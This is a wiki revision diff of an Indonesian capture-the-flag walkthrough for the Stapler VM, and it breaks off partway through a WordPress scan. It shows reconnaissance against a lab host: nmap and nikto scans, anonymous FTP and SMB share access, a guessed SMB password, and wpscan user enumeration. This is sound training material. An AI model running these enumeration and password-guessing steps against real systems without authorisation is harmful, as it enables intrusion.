Difference between revisions of "CTF Stapler: Walkthrough"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(16 intermediate revisions by the same user not shown) | |||
Line 47: | Line 47: | ||
* Download OVA | * Download OVA | ||
* Install di VirtualBox | * Install di VirtualBox | ||
− | * Jalankan | + | * Jalankan |
==Hack== | ==Hack== | ||
Line 99: | Line 99: | ||
nmap -sS -A -O -n -p1-60000 192.168.0.61 | nmap -sS -A -O -n -p1-60000 192.168.0.61 | ||
+ | nmap -v -A 192.168.0.61 | ||
− | Hasilnya | + | Hasilnya kira-kira, |
− | Starting Nmap 7. | + | Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 01:11 EST |
− | Nmap scan report for 192.168. | + | Initiating SYN Stealth Scan at 01:11 |
− | Host is up (0. | + | Scanning 192.168.0.61 [1000 ports] |
− | Not shown: | + | Discovered open port 21/tcp on 192.168.0.61 |
− | PORT | + | Discovered open port 139/tcp on 192.168.0.61 |
− | 20/tcp | + | Discovered open port 3306/tcp on 192.168.0.61 |
− | 21/tcp | + | Discovered open port 80/tcp on 192.168.0.61 |
+ | Discovered open port 53/tcp on 192.168.0.61 | ||
+ | Discovered open port 22/tcp on 192.168.0.61 | ||
+ | Discovered open port 666/tcp on 192.168.0.61 | ||
+ | Scanning 7 services on 192.168.0.61 | ||
+ | Nmap scan report for 192.168.0.61 | ||
+ | Host is up (0.00066s latency). | ||
+ | Not shown: 992 filtered tcp ports (no-response) | ||
+ | PORT STATE SERVICE VERSION | ||
+ | 20/tcp closed ftp-data | ||
+ | 21/tcp open ftp vsftpd 2.0.8 or later | ||
+ | | ftp-syst: | ||
+ | | STAT: | ||
+ | | FTP server status: | ||
+ | | Connected to 192.168.0.62 | ||
+ | | Logged in as ftp | ||
+ | | TYPE: ASCII | ||
+ | | No session bandwidth limit | ||
+ | | Session timeout in seconds is 300 | ||
+ | | Control connection is plain text | ||
+ | | Data connections will be plain text | ||
+ | | At session startup, client count was 4 | ||
+ | | vsFTPd 3.0.3 - secure, fast, stable | ||
+ | |_End of status | ||
| ftp-anon: Anonymous FTP login allowed (FTP code 230) | | ftp-anon: Anonymous FTP login allowed (FTP code 230) | ||
− | |_Can't get directory listing: | + | |_Can't get directory listing: PASV failed: 550 Permission denied. |
− | 22/tcp | + | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |
| ssh-hostkey: | | ssh-hostkey: | ||
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | ||
− | | | + | | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |
− | 53/tcp | + | |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) |
+ | 53/tcp open domain dnsmasq 2.75 | ||
| dns-nsid: | | dns-nsid: | ||
− | | id.server: | + | | NSID: 218m83 (3231386d3833) |
+ | | id.server: CGK | ||
|_ bind.version: dnsmasq-2.75 | |_ bind.version: dnsmasq-2.75 | ||
− | 80/tcp | + | 80/tcp open http PHP cli server 5.5 or later |
|_http-title: 404 Not Found | |_http-title: 404 Not Found | ||
− | + | | http-methods: | |
− | + | |_ Supported Methods: GET HEAD POST OPTIONS | |
− | + | 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) | |
− | 139/tcp | + | 666/tcp open doom? |
− | 666/tcp | + | | fingerprint-strings: |
− | 3306/tcp | + | | NULL: |
+ | | message2.jpgUT | ||
+ | | QWux | ||
+ | | "DL[E | ||
+ | | #;3[ | ||
+ | | \xf6 | ||
+ | | u([r | ||
+ | | qYQq | ||
+ | | Y_?n2 | ||
+ | | 3&M~{ | ||
+ | | 9-a)T | ||
+ | | L}AJ | ||
+ | |_ .npy.9 | ||
+ | 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 | ||
| mysql-info: | | mysql-info: | ||
| Protocol: 10 | | Protocol: 10 | ||
| Version: 5.7.12-0ubuntu1 | | Version: 5.7.12-0ubuntu1 | ||
− | | Thread ID: | + | | Thread ID: 10 |
| Capabilities flags: 63487 | | Capabilities flags: 63487 | ||
− | | Some Capabilities: | + | | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, |
− | SupportsLoadDataLocal, | + | SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, IgnoreSigpipes, |
− | + | Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, | |
− | + | LongPassword, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsAuthPlugins, | |
+ | SupportsMultipleResults, SupportsMultipleStatments | ||
| Status: Autocommit | | Status: Autocommit | ||
− | | Salt: | + | | Salt: <Xp\x1EH]w*\x1C"+\x14\x19\x16*\x15ZnR\x1D |
− | |_ Auth Plugin Name: | + | |_ Auth Plugin Name: mysql_native_password |
− | + | MAC Address: 08:00:27:8B:94:43 (Oracle VirtualBox virtual NIC) | |
− | + | Device type: general purpose | |
− | + | Running: Linux 3.X|4.X | |
− | + | OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 | |
+ | OS details: Linux 3.2 - 4.9 | ||
+ | Uptime guess: 0.005 days (since Mon Jan 23 01:04:14 2023) | ||
+ | Network Distance: 1 hop | ||
+ | TCP Sequence Prediction: Difficulty=262 (Good luck!) | ||
+ | IP ID Sequence Generation: All zeros | ||
+ | Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel | ||
+ | |||
Host script results: | Host script results: | ||
− | |_clock-skew: mean: | + | |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s |
− | + | | smb2-time: | |
− | | | + | | date: 2023-01-23T13:11:23 |
− | | | + | |_ start_date: N/A |
− | |||
− | |||
− | |||
− | |||
− | |_ | ||
| smb-security-mode: | | smb-security-mode: | ||
| account_used: guest | | account_used: guest | ||
Line 158: | Line 200: | ||
| challenge_response: supported | | challenge_response: supported | ||
|_ message_signing: disabled (dangerous, but default) | |_ message_signing: disabled (dangerous, but default) | ||
− | | | + | | nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) |
+ | | Names: | ||
+ | | RED<00> Flags: <unique><active> | ||
+ | | RED<03> Flags: <unique><active> | ||
+ | | RED<20> Flags: <unique><active> | ||
+ | | WORKGROUP<00> Flags: <group><active> | ||
+ | |_ WORKGROUP<1e> Flags: <group><active> | ||
+ | | smb2-security-mode: | ||
+ | | 3.1.1: | ||
+ | |_ Message signing enabled but not required | ||
+ | | smb-os-discovery: | ||
+ | | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | ||
+ | | Computer name: red | ||
+ | | NetBIOS computer name: RED\x00 | ||
+ | | Domain name: \x00 | ||
+ | | FQDN: red | ||
+ | |_ System time: 2023-01-23T13:11:23+00:00 | ||
TRACEROUTE | TRACEROUTE | ||
HOP RTT ADDRESS | HOP RTT ADDRESS | ||
− | 1 0. | + | 1 0.66 ms 192.168.0.61 |
− | + | OS and Service detection performed. Please report any incorrect results at | |
− | + | https://nmap.org/submit/ . | |
− | + | Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds | |
+ | Raw packets sent: 2024 (90.564KB) | Rcvd: 24 (1.428KB) | ||
− | + | Salah satu yang menarik disini adalah FTP, dengan anonymous FTP login. | |
− | |||
− | |||
− | |||
− | |||
===Anonymous FTP=== | ===Anonymous FTP=== | ||
− | + | Coba login anonymous ftp (username anonymous password bebas merdeka) | |
− | + | ||
− | + | ftp 192.168.0.61 | |
− | + | Connected to 192.168.0.61. | |
− | |||
− | Connected to 192.168. | ||
220- | 220- | ||
− | 220-| | + | 220-|----------------------------------------------------------------------------------------| |
220-| Harry, make sure to update the banner when you get a chance to show who has access here | | 220-| Harry, make sure to update the banner when you get a chance to show who has access here | | ||
− | 220-| | + | 220-|----------------------------------------------------------------------------------------| |
220- | 220- | ||
220 | 220 | ||
− | Name (192.168. | + | Name (192.168.0.61:kali): anonymous |
331 Please specify the password. | 331 Please specify the password. | ||
− | Password: | + | Password: |
230 Login successful. | 230 Login successful. | ||
Remote system type is UNIX. | Remote system type is UNIX. | ||
Using binary mode to transfer files. | Using binary mode to transfer files. | ||
ftp> | ftp> | ||
− | + | ||
− | + | Keren! cek ada file apa saja di FTP server tersebut dan ambil file yang ada :) .. | |
− | + | ||
ftp> ls | ftp> ls | ||
+ | 550 Permission denied. | ||
200 PORT command successful. Consider using PASV. | 200 PORT command successful. Consider using PASV. | ||
150 Here comes the directory listing. | 150 Here comes the directory listing. | ||
− | -rw-r--r-- 1 0 0 107 Jun 03 | + | -rw-r--r-- 1 0 0 107 Jun 03 2016 note |
226 Directory send OK. | 226 Directory send OK. | ||
ftp> get note | ftp> get note | ||
Line 207: | Line 261: | ||
200 PORT command successful. Consider using PASV. | 200 PORT command successful. Consider using PASV. | ||
150 Opening BINARY mode data connection for note (107 bytes). | 150 Opening BINARY mode data connection for note (107 bytes). | ||
+ | 100% | ||
+ | |*************************************************************************************************************************************************************************************| | ||
+ | 107 0.91 KiB/s 00:00 ETA | ||
226 Transfer complete. | 226 Transfer complete. | ||
− | 107 bytes received in 0 | + | 107 bytes received in 00:00 (0.91 KiB/s) |
− | ftp> | + | ftp> quit |
+ | 221 Goodbye. | ||
− | + | Buka note | |
+ | |||
+ | cat note | ||
+ | |||
+ | Isinya, | ||
+ | |||
+ | Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. | ||
+ | |||
+ | Tidak ada yang terlalu menarik,tapi ada dua (2) nama :) ... mungkin bisa membantu nanti jika kita butuh bruteforce. | ||
− | + | ==Coba SSH root== | |
− | + | Coba akses. | |
− | |||
− | + | ssh root@192.168.0.61 | |
− | + | Hasilnya gagal, | |
− | + | The authenticity of host '192.168.0.61 (192.168.0.61)' can't be established. | |
+ | ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A. | ||
+ | This key is not known by any other names | ||
+ | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes | ||
+ | Warning: Permanently added '192.168.0.61' (ED25519) to the list of known hosts. | ||
----------------------------------------------------------------- | ----------------------------------------------------------------- | ||
~ Barry, don't forget to put a message here ~ | ~ Barry, don't forget to put a message here ~ | ||
----------------------------------------------------------------- | ----------------------------------------------------------------- | ||
− | root@192.168. | + | root@192.168.0.61's password: |
Permission denied, please try again. | Permission denied, please try again. | ||
− | |||
− | + | Tapi kita dapat satu nama lagi :) .. | |
+ | |||
+ | ==Coba SMB== | ||
− | + | Coba, | |
− | + | ||
− | + | smbclient -L 192.168.0.61 | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Password for [WORKGROUP\root]: | |
− | |||
− | |||
− | + | Coba isi password dengan root. Untung2-an berhasil :) .. | |
− | + | Hasilnya kira-kira | |
− | WORKGROUP | + | Sharename Type Comment |
+ | --------- ---- ------- | ||
+ | print$ Disk Printer Drivers | ||
+ | kathy Disk Fred, What are we doing here? | ||
+ | tmp Disk All temporary files should be stored here | ||
+ | IPC$ IPC IPC Service (red server (Samba, Ubuntu)) | ||
+ | Reconnecting with SMB1 for workgroup listing. | ||
+ | |||
+ | Server Comment | ||
+ | --------- ------- | ||
+ | |||
+ | Workgroup Master | ||
+ | --------- ------- | ||
+ | WORKGROUP SCANDISK | ||
+ | |||
+ | |||
+ | Tampaknya ada 2 active share - kathy dan tmp. | ||
+ | Yang menarik ada komentar - Fred, What are we doing here? | ||
+ | Tampaknya Fred bisa mengakses kathy share. | ||
+ | Mari kita akses kathy share menggunakan networked user/computer fred. | ||
+ | |||
+ | smbclient //fred/kathy -I 192.168.0.61 -N | ||
− | + | Coba check ls | |
− | + | Try "help" to get a list of possible commands. | |
− | |||
− | |||
smb: \> ls | smb: \> ls | ||
− | . D 0 Fri Jun 3 | + | . D 0 Fri Jun 3 12:52:52 2016 |
− | .. D 0 Mon Jun 6 | + | .. D 0 Mon Jun 6 17:39:56 2016 |
− | kathy_stuff D 0 Sun Jun 5 | + | kathy_stuff D 0 Sun Jun 5 11:02:27 2016 |
− | backup D 0 Sun Jun 5 | + | backup D 0 Sun Jun 5 11:04:14 2016 |
− | + | ||
− | + | 19478204 blocks of size 1024. 16397108 blocks available | |
+ | smb: \> | ||
− | + | Keren! tampaknya kita bisa tersambung. | |
+ | Lakukan enumerate file dan folder. | ||
− | smb: \> cd kathy_stuff | + | smb: \> cd kathy_stuff\ |
smb: \kathy_stuff\> ls | smb: \kathy_stuff\> ls | ||
− | . D 0 Sun Jun 5 | + | . D 0 Sun Jun 5 11:02:27 2016 |
− | .. D 0 Fri Jun 3 | + | .. D 0 Fri Jun 3 12:52:52 2016 |
− | todo-list.txt N 64 Sun Jun 5 | + | todo-list.txt N 64 Sun Jun 5 11:02:27 2016 |
− | + | ||
− | + | 19478204 blocks of size 1024. 16397108 blocks available | |
− | smb: \kathy_stuff\> get todo-list.txt | + | smb: \kathy_stuff\> get todo-list.txt |
− | getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt ( | + | getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.3 KiloBytes/sec) |
− | + | (average 3.3 KiloBytes/sec) | |
smb: \kathy_stuff\> cd .. | smb: \kathy_stuff\> cd .. | ||
− | smb: \> | + | smb: \> cd backup\ |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
smb: \backup\> ls | smb: \backup\> ls | ||
− | . D 0 Sun Jun 5 | + | . D 0 Sun Jun 5 11:04:14 2016 |
− | .. D 0 Fri Jun 3 | + | .. D 0 Fri Jun 3 12:52:52 2016 |
− | vsftpd.conf N 5961 Sun Jun 5 | + | vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016 |
− | wordpress-4.tar.gz N 6321767 Mon Apr 27 | + | wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015 |
− | + | ||
− | + | 19478204 blocks of size 1024. 16397108 blocks available | |
smb: \backup\> get vsftpd.conf | smb: \backup\> get vsftpd.conf | ||
− | getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf ( | + | getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (306.4 KiloBytes/sec) (average 154.8 KiloBytes/sec) |
− | + | smb: \backup\> quit | |
− | smb: \backup\> | + | |
− | + | ||
− | + | Setelah kita selesai dengan kathy share, kita bisa lakukan hal yang sama untuk tmp share, | |
+ | |||
+ | smbclient //fred/tmp -I 192.168.0.61 -N | ||
+ | Try "help" to get a list of possible commands. | ||
+ | smb: \> ls | ||
+ | . D 0 Tue Jun 7 04:08:39 2016 | ||
+ | .. D 0 Mon Jun 6 17:39:56 2016 | ||
+ | ls N 274 Sun Jun 5 11:32:58 2016 | ||
− | smb: \> | + | 19478204 blocks of size 1024. 16397096 blocks available |
+ | smb: \> quit | ||
− | + | Tampaknya tidak ada yang menarik, paling tidak kita dapat file konfigurasi FTP, dan to-do-list. | |
− | + | Coba kita lihat, | |
− | + | ||
− | + | cat todo-list.txt | |
− | |||
− | |||
− | |||
− | |||
− | + | isinya, | |
− | |||
− | |||
− | |||
− | + | I'm making sure to backup anything important for Initech, Kathy | |
− | + | Coba kita lihat, | |
− | + | cat ls | |
− | + | isinya, | |
− | |||
.: | .: | ||
total 12.0K | total 12.0K | ||
Line 334: | Line 407: | ||
drwxr-xr-x 16 root root 4.0K Jun 3 22:06 .. | drwxr-xr-x 16 root root 4.0K Jun 3 22:06 .. | ||
-rw-r--r-- 1 root root 0 Jun 5 16:32 ls | -rw-r--r-- 1 root root 0 Jun 5 16:32 ls | ||
− | drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd- timesyncd.service-vFKoxJ | + | drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ |
− | |||
− | |||
− | + | ||
+ | ==Nikto 12380== | ||
+ | Cek web | ||
+ | nikto -h 192.168.0.61:12380 | ||
− | + | Hasilnya, | |
− | |||
- Nikto v2.1.6 | - Nikto v2.1.6 | ||
--------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ||
− | + Target IP: 192.168. | + | + Target IP: 192.168.0.61 |
− | + Target Hostname: 192.168. | + | + Target Hostname: 192.168.0.61 |
+ Target Port: 12380 | + Target Port: 12380 | ||
--------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ||
− | + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost | + | + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are |
+ | you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put | ||
+ | here./CN=Red.Initech/emailAddress=pam@red.localhost | ||
Ciphers: ECDHE-RSA-AES256-GCM-SHA384 | Ciphers: ECDHE-RSA-AES256-GCM-SHA384 | ||
− | Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost | + | Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are |
− | + Start Time: | + | you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put |
+ | here./CN=Red.Initech/emailAddress=pam@red.localhost | ||
+ | + Start Time: 2023-01-23 01:55:17 (GMT-5) | ||
--------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ||
+ Server: Apache/2.4.18 (Ubuntu) | + Server: Apache/2.4.18 (Ubuntu) | ||
− | |||
+ The anti-clickjacking X-Frame-Options header is not present. | + The anti-clickjacking X-Frame-Options header is not present. | ||
− | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | + | + The X-XSS-Protection header is not defined. This header can hint to the user agent to |
+ | protect against some forms of XSS | ||
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here | + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here | ||
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined. | + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. | ||
− | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | + | + The site uses SSL and Expect-CT header is not present. |
+ | + The X-Content-Type-Options header is not set. This could allow the user agent to render | ||
+ | the content of the site in a different fashion to the MIME type | ||
+ No CGI Directories found (use '-C all' to force check all possible dirs) | + No CGI Directories found (use '-C all' to force check all possible dirs) | ||
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) | + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) | ||
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) | + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) | ||
+ "robots.txt" contains 2 entries which should be manually viewed. | + "robots.txt" contains 2 entries which should be manually viewed. | ||
− | + Hostname '192.168. | + | + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 |
+ | is the EOL for the 2.x branch. | ||
+ | + Hostname '192.168.0.61' does not match certificate's names: Red.Initech | ||
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS | + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS | ||
+ Uncommon header 'x-ob_mode' found, with contents: 1 | + Uncommon header 'x-ob_mode' found, with contents: 1 | ||
+ OSVDB-3233: /icons/README: Apache default file found. | + OSVDB-3233: /icons/README: Apache default file found. | ||
+ /phpmyadmin/: phpMyAdmin directory found | + /phpmyadmin/: phpMyAdmin directory found | ||
− | + | + | + 8071 requests: 0 error(s) and 15 item(s) reported on remote host |
− | + End Time: | + | + End Time: 2023-01-23 01:59:01 (GMT-5) (224 seconds) |
--------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ||
+ 1 host(s) tested | + 1 host(s) tested | ||
− | |||
− | + | Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt. | |
+ | |||
+ | ==Akses Web== | ||
+ | |||
+ | Coba akses, | ||
+ | |||
+ | https://192.168.0.61:12380/robots.txt | ||
+ | |||
+ | Tampak isinya, | ||
User-agent: * | User-agent: * | ||
Line 385: | Line 473: | ||
Disallow: /blogblog/ | Disallow: /blogblog/ | ||
− | + | Mari kita coba | |
+ | |||
+ | https://192.168.0.61:12380/admin112233/ | ||
+ | |||
+ | Akan mengeluarkan "humor" | ||
+ | |||
+ | This could of been a BeEF-XSS hook ;) | ||
+ | |||
+ | Mari kita coba | ||
+ | |||
+ | https://192.168.0.61:12380/blogblog/ | ||
+ | |||
+ | Tampak berisi blog, tidak ada yang terlalu menarik kecuali ada beberapa nama. Dan yang menarik ada login page. | ||
+ | ==WPScan== | ||
+ | Scan menggunakan, | ||
− | + | wpscan --url https://192.168.0.61:12380/blogblog/ -e u --disable-tls-checks | |
+ | wpscan --url https://192.168.0.61:12380/blogblog/ -e ap --disable-tls-checks | ||
− | + | Hasilnya, | |
+ | _______________________________________________________________ | ||
+ | __ _______ _____ | ||
+ | \ \ / / __ \ / ____| | ||
+ | \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® | ||
+ | \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ | ||
+ | \ /\ / | | ____) | (__| (_| | | | | | ||
+ | \/ \/ |_| |_____/ \___|\__,_|_| |_| | ||
+ | WordPress Security Scanner by the WPScan Team | ||
+ | Version 3.8.22 | ||
+ | Sponsored by Automattic - https://automattic.com/ | ||
+ | @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart | ||
+ | _______________________________________________________________ | ||
+ | |||
+ | [+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61] | ||
+ | [+] Started: Mon Jan 23 03:19:59 2023 | ||
+ | |||
+ | Interesting Finding(s): | ||
+ | |||
+ | [+] Headers | ||
+ | | Interesting Entries: | ||
+ | | - Server: Apache/2.4.18 (Ubuntu) | ||
+ | | - Dave: Soemthing doesn't look right here | ||
+ | | Found By: Headers (Passive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php | ||
+ | | Found By: Headers (Passive Detection) | ||
+ | | Confidence: 100% | ||
+ | | Confirmed By: | ||
+ | | - Link Tag (Passive Detection), 30% confidence | ||
+ | | - Direct Access (Aggressive Detection), 100% confidence | ||
+ | | References: | ||
+ | | - http://codex.wordpress.org/XML-RPC_Pingback_API | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ | ||
+ | |||
+ | [+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register | ||
+ | | Found By: Di rect Access (Aggressive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp- content/uploads/ | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 60% | ||
+ | | References: | ||
+ | | - https://www.iplocation.net/defend-wordpress-from-ddos | ||
+ | | - https://github.com/wpscanteam/wpscan/issues/1299 | ||
+ | |||
+ | [+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27). | ||
+ | | Found By: Rss Generator (Passive Detection) | ||
+ | | - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | ||
+ | | - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | ||
+ | |||
+ | [+] WordPress theme in use: bhost | ||
+ | | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/ | ||
+ | | Last Updated: 2022-10-30T00:00:00.000Z | ||
+ | | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt | ||
+ | | [!] The version is out of date, the latest version is 1.6 | ||
+ | | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1 | ||
+ | | Style Name: BHost | ||
+ | | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... | ||
+ | | Author: Masum Billah | ||
+ | | Author URI: http://getmasum.net/ | ||
+ | | | ||
+ | | Found By: Css Style In Homepage (Passive Detection) | ||
+ | | | ||
+ | | Version: 1.2.9 (80% confidence) | ||
+ | | Found By: Style (Passive Detection) | ||
+ | | - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9' | ||
+ | |||
+ | [+] Enumerating Users (via Passive and Aggressive Methods) | ||
+ | Brute Forcing Author IDs - Time: 00:00:00 | ||
+ | <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 | ||
+ | |||
+ | [i] User(s) Identified: | ||
+ | |||
+ | [+] John Smith | ||
+ | | Found By: Author Posts - Display Name (Passive Detection) | ||
+ | | Confirmed By: Rss Generator (Passive Detection) | ||
+ | |||
+ | [+] john | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] garry | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] barry | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] elly | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] peter | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] heather | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] harry | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] scott | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] kathy | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [+] tim | ||
+ | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | ||
+ | | Confirmed By: Login Error Messages (Aggressive Detection) | ||
+ | |||
+ | [!] No WPScan API Token given, as a result vulnerability data has not been output. | ||
+ | [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register | ||
+ | |||
+ | [+] Finished: Mon Jan 23 03:20:02 2023 | ||
+ | [+] Requests Done: 23 | ||
+ | [+] Cached Requests: 55 | ||
+ | [+] Data Sent: 7.361 KB | ||
+ | [+] Data Received: 49.097 KB | ||
+ | [+] Memory used: 193.543 MB | ||
+ | [+] Elapsed time: 00:00:03 | ||
− | |||
− | + | Hasil -e ap | |
+ | _______________________________________________________________ | ||
+ | __ _______ _____ | ||
+ | \ \ / / __ \ / ____| | ||
+ | \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® | ||
+ | \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ | ||
+ | \ /\ / | | ____) | (__| (_| | | | | | ||
+ | \/ \/ |_| |_____/ \___|\__,_|_| |_| | ||
+ | |||
+ | WordPress Security Scanner by the WPScan Team | ||
+ | Version 3.8.22 | ||
+ | Sponsored by Automattic - https://automattic.com/ | ||
+ | @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart | ||
_______________________________________________________________ | _______________________________________________________________ | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | [+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61] | |
− | + | [+] Started: Mon Jan 23 03:23:24 2023 | |
− | + | ||
− | + | Interesting Finding(s): | |
− | + | ||
+ | [+] Headers | ||
+ | | Interesting Entries: | ||
+ | | - Server: Apache/2.4.18 (Ubuntu) | ||
+ | | - Dave: Soemthing doesn't look right here | ||
+ | | Found By: Headers (Passive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php | ||
+ | | Found By: Headers (Passive Detection) | ||
+ | | Confidence: 100% | ||
+ | | Confirmed By: | ||
+ | | - Link Tag (Passive Detection), 30% confidence | ||
